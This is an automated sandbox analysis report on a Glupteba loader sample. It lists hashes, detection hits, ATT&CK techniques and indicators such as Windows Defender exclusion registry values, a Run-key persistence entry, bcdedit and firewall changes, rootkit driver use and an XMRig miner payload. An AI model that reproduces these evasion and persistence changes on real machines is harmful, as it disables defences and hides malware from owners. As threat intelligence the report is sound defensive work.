glupteba | 6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b

Analysis

max time kernel
272s
max time network
303s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
19/02/2024, 04:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Size

4.1MB
MD5

122a3c17c74990fddba171cf94ad8ab5
SHA1

f10a7edd419f4e4bea7b689027cb4db07a1b9553
SHA256

6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b
SHA512

81eee32bd51b4a10a0ec8c29672ba81b57f9cd0904f516539360d389c501208a47573ce272c5ff4cdefe089dca3ae231712a137772a7fe5927156747c80239f6
SSDEEP

98304:qIIjxDdO93PfdJ8GxRJ07SrQMYyLLqEiqvGnwsIkXuhuNq3R:8jxcPlJ8GJ0mrLYy/NvcfXua6R

Score

10^/10

glupteba xmrig discovery dropper evasion loader miner persistence rootkit trojan upx

Malware Config

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 39 IoCs

resource	yara_rule
behavioral1/memory/2572-2-0x0000000002900000-0x00000000031EB000-memory.dmp	family_glupteba
behavioral1/memory/2572-3-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2572-6-0x0000000002900000-0x00000000031EB000-memory.dmp	family_glupteba
behavioral1/memory/2572-4-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2868-9-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2868-18-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-33-0x0000000002BD0000-0x00000000034BB000-memory.dmp	family_glupteba
behavioral1/memory/1160-34-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-112-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-117-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-118-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-148-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-155-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-158-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-160-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-162-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-164-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-166-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-168-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-170-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-172-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-174-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-176-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-178-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-180-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-182-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-184-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-186-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-188-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-190-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-192-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-194-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-196-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-198-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-230-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1708-244-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1708-245-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-251-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1160-257-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba

Windows security bypass 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe = "0"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe

XMRig Miner payload 4 IoCs

miner

resource	yara_rule
behavioral1/files/0x000200000000f875-235.dat	family_xmrig
behavioral1/files/0x000200000000f875-235.dat	xmrig
behavioral1/files/0x000200000000f875-237.dat	family_xmrig
behavioral1/files/0x000200000000f875-237.dat	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Modifies boot configuration data using bcdedit 14 IoCs

pid	Process
748	bcdedit.exe
876	bcdedit.exe
564	bcdedit.exe
2176	bcdedit.exe
2308	bcdedit.exe
368	bcdedit.exe
1808	bcdedit.exe
2312	bcdedit.exe
2400	bcdedit.exe
1752	bcdedit.exe
1624	bcdedit.exe
2232	bcdedit.exe
1584	bcdedit.exe
2228	bcdedit.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\Winmon.sys	csrss.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2672	netsh.exe

Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059

Executes dropped EXE 11 IoCs

pid	Process
1160	csrss.exe
1452	patch.exe
1220	injector.exe
552	dsefix.exe
2908	windefender.exe
2992	windefender.exe
2188	dcb505dc2b9d8aac05f4ca0727f5eadb.exe
2892	713674d5e968cbe2102394be0b2bae6f.exe
3028	1bf850b4d9587c1017a75a47680584c4.exe
2936	wup.exe
1708	csrss.exe

Loads dropped DLL 21 IoCs

pid	Process
2868	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
2868	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
844	Process not Found
1452	patch.exe
1452	patch.exe
1452	patch.exe
1452	patch.exe
1452	patch.exe
1160	csrss.exe
1452	patch.exe
1452	patch.exe
1452	patch.exe
1160	csrss.exe
1160	csrss.exe
1160	csrss.exe
1160	csrss.exe
1160	csrss.exe
1160	csrss.exe
1160	csrss.exe
2188	dcb505dc2b9d8aac05f4ca0727f5eadb.exe
2188	dcb505dc2b9d8aac05f4ca0727f5eadb.exe

UPX packed file 23 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0005000000005b81-151.dat	upx
behavioral1/memory/2908-152-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/2992-156-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/2908-157-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/2992-159-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/2992-163-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/files/0x0007000000004ed7-201.dat	upx
behavioral1/memory/1160-203-0x000000002D460000-0x000000002D941000-memory.dmp	upx
behavioral1/files/0x0007000000004ed7-204.dat	upx
behavioral1/files/0x0007000000004ed7-209.dat	upx
behavioral1/files/0x000300000000b3e3-217.dat	upx
behavioral1/files/0x000300000000b3e3-216.dat	upx
behavioral1/files/0x000300000000b3e3-211.dat	upx
behavioral1/memory/2892-220-0x00000000008B0000-0x000000000117D000-memory.dmp	upx
behavioral1/files/0x000300000000b3eb-222.dat	upx
behavioral1/files/0x000300000000b3eb-224.dat	upx
behavioral1/files/0x000300000000b3eb-227.dat	upx
behavioral1/files/0x000300000000b3eb-229.dat	upx
behavioral1/memory/3028-232-0x0000000000400000-0x00000000008E8000-memory.dmp	upx
behavioral1/memory/2188-241-0x0000000000400000-0x00000000008E1000-memory.dmp	upx
behavioral1/memory/2892-253-0x00000000008B0000-0x000000000117D000-memory.dmp	upx
behavioral1/memory/3028-254-0x0000000000400000-0x00000000008E8000-memory.dmp	upx
behavioral1/memory/3028-261-0x0000000000400000-0x00000000008E8000-memory.dmp	upx

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe = "0"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Manipulates WinMon driver. 1 IoCs

Roottkits write to WinMon to hide PIDs from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMon	csrss.exe

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\rss	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
File created	C:\Windows\rss\csrss.exe	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20240219044811.cab	makecab.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2836	sc.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1480	schtasks.exe
1940	schtasks.exe

GoLang User-Agent 3 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	40	Go-http-client/1.1
HTTP User-Agent header	42	Go-http-client/1.1
HTTP User-Agent header	44	Go-http-client/1.1

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-512 = "Central Asia Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-362 = "GTB Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-351 = "FLE Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-562 = "SE Asia Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-331 = "E. Europe Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-532 = "Sri Lanka Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-661 = "Cen. Australia Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-771 = "Montevideo Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-191 = "Mountain Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-742 = "New Zealand Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-551 = "North Asia Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1022 = "Bangladesh Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-152 = "Central America Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-51 = "Greenland Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-452 = "Caucasus Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-111 = "Eastern Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-592 = "Malay Peninsula Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-541 = "Myanmar Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
